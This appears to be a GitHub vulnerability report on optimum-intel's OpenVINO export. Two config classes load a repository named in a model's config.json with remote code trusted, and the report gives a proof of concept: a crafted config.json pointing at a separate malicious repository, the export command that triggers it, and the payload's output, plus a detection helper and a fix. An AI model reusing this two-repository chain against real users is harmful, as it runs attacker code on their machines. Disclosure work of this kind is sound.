Remote Code Execution via LlavaQwen2OpenVINOConfig and Phi3VisionOpenVINOConfig #1668

## Description

There is a remote code execution vulnerability in `optimum-intel` during OpenVINO export of multimodal models. The issue is in `LlavaQwen2OpenVINOConfig` and `Phi3VisionOpenVINOConfig`, which unconditionally call `AutoConfig.from_pretrained(..., trust_remote_code=True)` on the repository specified by `config.mm_vision_tower` and `config.img_processor["model_name"]`, respectively.

At first glance this may look acceptable, because the real `llava-qwen2` and `phi3_v` architectures normally require custom remote code. That assumption is unsafe. Taking `LlavaQwen2OpenVINOConfig` as an example: an attacker can publish a seemingly normal model repository, set `export_model_type` to `llava-qwen2`, and set the `mm_vision_tower` field in `config.json` so that it points to an attacker-controlled backend repository. When a user runs the normal OpenVINO export command, `optimum-intel` initializes `LlavaQwen2OpenVINOConfig`, fetches the attacker-controlled backend config with `trust_remote_code=True`, and executes the remote code it contains.

This creates a stealthy two-repository attack. The frontend repository can look benign and contain only a crafted `config.json`, while the actual malicious code is stored in a separate backend repository. As a result, the attack can mislead users and bypass existing security checks that focus only on the frontend repo.

This issue can be triggered through the standard `optimum-cli export openvino` workflow. That makes the attack practical for normal users who are simply trying to convert a model, without realizing that the export step itself can execute attacker-controlled code.
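Because the second repository is only named inside the frontend `config.json`, a reviewer can at least surface those references before exporting. The following is a minimal sketch of such a check, not part of `optimum-intel`: the helper name `find_nested_repo_refs` is hypothetical, and it only looks at the three fields discussed in this report.

```python
import json


def find_nested_repo_refs(config: dict) -> dict:
    """Return the config fields from this report that redirect the exporter.

    Hypothetical helper for illustration; it is not an optimum-intel API.
    """
    refs = {}
    # export_model_type overrides model_type when the export config is chosen.
    if "export_model_type" in config:
        refs["export_model_type"] = config["export_model_type"]
    # mm_vision_tower is loaded by LlavaQwen2OpenVINOConfig.
    tower = config.get("mm_vision_tower")
    if isinstance(tower, str):
        refs["mm_vision_tower"] = tower
    # img_processor["model_name"] is loaded by Phi3VisionOpenVINOConfig.
    img_processor = config.get("img_processor")
    if isinstance(img_processor, dict) and isinstance(img_processor.get("model_name"), str):
        refs["img_processor.model_name"] = img_processor["model_name"]
    return refs


# The frontend config.json used in the proof of concept.
frontend_config = json.loads("""
{
  "model_type": "llava",
  "export_model_type": "llava-qwen2",
  "mm_vision_tower": "XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-evil"
}
""")

for field, value in find_nested_repo_refs(frontend_config).items():
    print(f"{field} -> {value}")
```

Any repository reported this way would need the same scrutiny as the frontend repository, since its code runs during export.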

## Root Cause

The vulnerable code is:

https://github.com/huggingface/optimum-intel/blob/e17aa5a3b65991c9b29c8ffef710b5b5f3807a63/optimum/exporters/openvino/model_configs.py#L2187-L2192

and 

https://github.com/huggingface/optimum-intel/blob/e17aa5a3b65991c9b29c8ffef710b5b5f3807a63/optimum/exporters/openvino/model_configs.py#L3079-L3083

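The export path also lets an attacker-controlled model reach these classes, because `export_model_type` from the model's own config takes precedence over `model_type` when the export config is selected: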

```python
if hasattr(model.config, "export_model_type"):
    model_type = model.config.export_model_type
else:
    model_type = model.config.model_type

submodel_paths = export_from_model(
    model=model,
    output=output,
    task=task,
    ov_config=ov_config,
    stateful=stateful,
    model_kwargs=model_kwargs,
    custom_export_configs=custom_export_configs,
    fn_get_submodels=fn_get_submodels,
    preprocessors=preprocessors,
    device=device,
    trust_remote_code=trust_remote_code,
    patch_16bit_model=patch_16bit,
    **kwargs_shapes,
)
```
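The effect of that precedence rule can be reproduced in isolation. The sketch below copies only the `if`/`else` branch from the excerpt above into a standalone function (the name `resolve_export_model_type` is hypothetical) and uses `SimpleNamespace` as a stand-in for a loaded config object.

```python
from types import SimpleNamespace


def resolve_export_model_type(config) -> str:
    # Same branch as in the excerpt: export_model_type wins when present.
    if hasattr(config, "export_model_type"):
        return config.export_model_type
    return config.model_type


# Stand-in for the frontend config from the proof of concept.
attacker_config = SimpleNamespace(
    model_type="llava",
    export_model_type="llava-qwen2",
    mm_vision_tower="XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-evil",
)
# Stand-in for a config that does not set export_model_type.
plain_config = SimpleNamespace(model_type="llava")

print(resolve_export_model_type(attacker_config))
print(resolve_export_model_type(plain_config))
```

A repository that declares `model_type: "llava"` can therefore still be routed to the `llava-qwen2` export config purely through a field the repository author controls.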

## Proof of Concept

I created two Hugging Face repositories for demonstration.

The frontend repository, `XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-benign`, contains a crafted `config.json`:

```json
{
  "model_type": "llava",
  "export_model_type": "llava-qwen2",
  "mm_vision_tower": "XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-evil"
}
```

The backend repository, `XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-evil`, contains attacker-controlled code that will be loaded through `AutoConfig.from_pretrained(..., trust_remote_code=True)`.

Then run the normal export command:

```bash
optimum-cli export openvino \
  --model XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-benign \
  --task image-text-to-text \
  ./tmpdir
```

During export, `optimum-intel` reads the frontend model config, sees `export_model_type: "llava-qwen2"`, and initializes `LlavaQwen2OpenVINOConfig`. Inside that class, it executes:

```python
AutoConfig.from_pretrained(config.mm_vision_tower, trust_remote_code=True)
```

Since `mm_vision_tower` points to the attacker-controlled backend repository, i.e., `XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-evil`, remote code from that repository is fetched and executed. This leads to arbitrary code execution on the victim host during the normal export workflow.


```bash
$ optimum-cli export openvino --model XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-benign --task image-text-to-text ./tmpdir
Execute Malicious Payload!!!
Execute Malicious Payload!!!
Execute Malicious Payload!!!
```

For reference, the two snippets linked under Root Cause are reproduced here. In `LlavaQwen2OpenVINOConfig`:

    self._behavior = behavior
    self._orig_config = config
    if self._behavior == VLMConfigBehavior.VISION_EMBEDDINGS:
        config = AutoConfig.from_pretrained(config.mm_vision_tower, trust_remote_code=True)
        if hasattr(config, "vision_config"):
            config = config.vision_config

In `Phi3VisionOpenVINOConfig`:

    if self._behavior == Phi3VisionConfigBehavior.VISION_EMBEDDINGS and hasattr(config, "img_processor"):
        self._config = AutoConfig.from_pretrained(
            config.img_processor["model_name"], trust_remote_code=True
        ).vision_config
        self._normalized_config = self.NORMALIZED_CONFIG_CLASS(self._config)
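One possible direction, offered as an assumption and not as a fix confirmed by the maintainers, is to stop hard-coding `trust_remote_code=True` for the nested repository and pass through whatever the user chose for the export. The sketch below illustrates the idea with a hypothetical helper, `load_nested_config`; the `loader` parameter exists only so the example runs without network access, and by default it falls back to `transformers.AutoConfig.from_pretrained`.

```python
def load_nested_config(repo_id, trust_remote_code=False, loader=None):
    """Load a nested config while honoring the caller's trust decision.

    Hypothetical helper for illustration; it is not an optimum-intel API.
    """
    if loader is None:
        # Imported lazily so the demo below works without transformers installed.
        from transformers import AutoConfig

        loader = AutoConfig.from_pretrained
    # Forward the caller's flag; never upgrade it to True implicitly.
    return loader(repo_id, trust_remote_code=trust_remote_code)


# Demo with a fake loader that records how it was called.
calls = []


def fake_loader(repo_id, **kwargs):
    calls.append((repo_id, kwargs))
    return {"repo": repo_id}


load_nested_config(
    "XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-evil",
    loader=fake_loader,
)
print(calls[0][1])
```

With the default `trust_remote_code=False`, a nested repository that requires custom code would be expected to fail to load rather than execute silently, so the user has to opt in explicitly.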
